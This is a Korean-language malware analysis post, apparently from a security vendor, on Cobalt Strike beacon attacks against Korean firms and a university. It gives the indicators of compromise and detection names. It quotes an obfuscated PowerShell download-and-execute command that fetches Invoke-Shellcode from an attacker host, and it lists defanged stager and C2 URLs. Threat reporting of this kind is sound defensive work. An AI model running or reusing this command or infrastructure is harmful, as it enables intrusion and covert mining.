국내 기업을 타겟으로 유포 중인 코발트 스트라이크 (2)
ASEC 분석팀은 코발트 스트라이크 해킹 툴에 의한 공격을 모니터링하고 있으며, 여기에서는 과거 다루었던 블로그 이후부터 현재까지 확인된 코발트 스트라이크 공격에 대해 정리하도록 한다.
국내 기업을 타겟으로 유포 중인 코발트 스트라이크 – ASEC BLOG
코발트 스트라이크(Cobalt Strike)는 상용 침투 테스트 도구이다. 기업이나 기관의 네트워크 및 시스템에 대한 보안 취약점을 점검하기 위한 목적으로 사용 가능한 도구로서 침투 테스트 각 단계별로 다양한 기능들을 지원한다. 하지만 크랙 버전이 공개됨에 따라 다양한 공격자들에 의해 악성코드로서 사용되고 있으며, 특히 다수의 랜섬웨어 공격자들이 내부 시스템 장악을 위한 중간 단계로써 사용하고 있는 사례가 늘고 있다. 2020년 11월, 코발트 스트라이크의 소스 코드가 유출되었고 최신 크랙 버전도 유포됨에 따라 더 많은 공격자들에게…
4월 23일 확인된 공격을 보면 코발트 스트라이크 beacon이 다음과 같은 커맨드라인을 갖는 프로세스에 의해 실행되었다. 코발트 스트라이크를 이용하는 공격자들은 보통 정상 프로세스로 위장시키기 위해, 정상 프로세스에 특정 인자까지 지정한 후 실행하고 여기에 실제 백도어인 beacon을 인젝션하는 방식을 사용한다. 이는 코발트 스트라이크 해킹 툴에서 실제 지원하는 기능이다.
svchost.exe -k LocalServiceNetworkRestricted
위의 beacon 프로세스가 실행되기 이전에는 다음과 같은 난독화된 파워쉘 커맨드 라인 로그가 확인되었다.
powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’;$ien=’ownloadString(”hxxp://hcut.co[.]kr/api/runtime.ps1”)’;$nv3=’IEX(New-Object Net.WebClient).Do’;$qc=’wnloadString…(이하생략)
다운로드 받아지는 runtime.ps1은 실제로 Invoke-Shellcode.ps1이며 이는 또 다른 파워쉘 기반 공격 툴인 PowerSploit 및 Empire에서 제공하는 파워쉘 스크립트이다. Invoke-Shellcode는 이름과 같이 인자로 쉘코드 페이로드를 받아 실행시키는 기능을 담당한다. 즉 Invoke-Shellcode.ps1을 통해 코발트 스트라이크를 설치했을 것으로 추정된다.
– runtime.ps1 : Invoke-Shellcode.ps1 ( 다운로드 주소 : hxxp://hcut.co[.]kr/api/runtime.ps1 )
설치된 이후에는 다음과 같이 정보 획득 및 코인 마이너 악성코드들을 생성한 이력이 확인된다.
– na.exe : 하드웨어 정보 획득
– 1.exe : XMRig 코인 마이너 인젝터. 정상 동작 불가.
– 2.exe : XMRig 코인 마이너 인젝터. 정상 동작 불가.
참고로 감염 환경에서는 과거에도 이미 코발트 스트라이크 및 코인 마이너 악성코드들이 설치된 이력이 존재한다.
– 2008.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/cDIl )
– 2008a.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/eZ5h )
– bits_se.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/cDIl )
– k64.src : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://www.pc1024[.]net:3322/NDaj )
– shellcode.dll : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/yGYC )
– 51032u.exe : 코인 마이너 인스톨러
– avmi.exe : XMRig 코인 마이너
– xmrig.exe : XMRig 코인 마이너
– svchost.exe : NSSM 서비스 관리자
다음으로 3월 16일에 확인된 사례가 있다. 유포된 기업은 특정 기업의 계열사로 추정된다. 파워쉘(powershell) 프로세스가 특정 폴더에 있는 악성 스크립트(%temp%\tmp5O91.ps1)를 실행하여 비컨을 다운로드 하려는 행위가 포착되었다.
해당 스크립트는 Base64 디코딩 과정 없이 XOR(0x35) 후 쉘코드를 메모리에 로드한다.
위 쉘코드는 비컨을 다운로드하는 ‘Stager’ 형태로 최하단의 C2(pilottrustme[.]top, 54.238.214[.]219)로부터 비컨 다운로드를 시도한다. 하지만 현재 연결이 되지 않아 이후 비컨에 대한 정보를 확인할 수 없다.
마지막으로 3월 26일, 국내 모 대학교에서 감염이 확인되었다. 확인된 샘플은 msvcruntime.exe라는 이름으로 Time Date Stamp(빌드 시간) 값이 없이 유포되었으며, 오픈 소스 패커인 ‘PEzor’를 사용했으며 최종적으로 특정 쉘코드를 실행한다. 최종적으로 실행되는 쉘코드는 비컨을 다운로드하는 쉘코드로, 코발트 스트라이크에서는 이를 ‘Stager’ 페이로드 방식이라 부른다.
해당 쉘코드가 접속하는 C2 도메인은 좌측 하단의 ‘oxoo[.]cc’이다. 하지만 현재 ‘404 Not Found’로 연결되지 않아 비컨을 다운로드 할 수 없어 비컨에 대한 이후 정보를 확인할 수 없다.
안랩 제품에서는 코발트 스트라이크를 활용한 첫 침투 단계부터 내부 확산 시 사용되는 비컨 백도어에 대해 프로세스 메모리 기반의 탐지 방식과 행위 기반의 탐지 기술을 보유하고 있다.
[파일 진단]
– Trojan/PowerShell.InvokeShell (2021.04.27.00)
– Infostealer/Win.Sysinfo.C4439416 (2021.04.26.03)
– CoinMiner/Win.XMRig.C4439427 (2021.04.27.00)
– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)
– Malware/Win32.Generic.C1883131 (2017.03.27.01)
– Trojan/Win32.RL_Generic.R292199 (2019.09.20.01)
– Trojan/Win32.Wacatac.R355370 (2020.11.11.02)
– CoinMiner/Win.Agent.C4439419 (2021.04.26.03)
– Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
– Unwanted/Win.NSSM.C4439418 (2021.04.26.03)
– Trojan/PS.Cobalt (2021.04.06.00)
– Trojan/Win.CobaltStrike.C4399063 (2021.04.01.01)
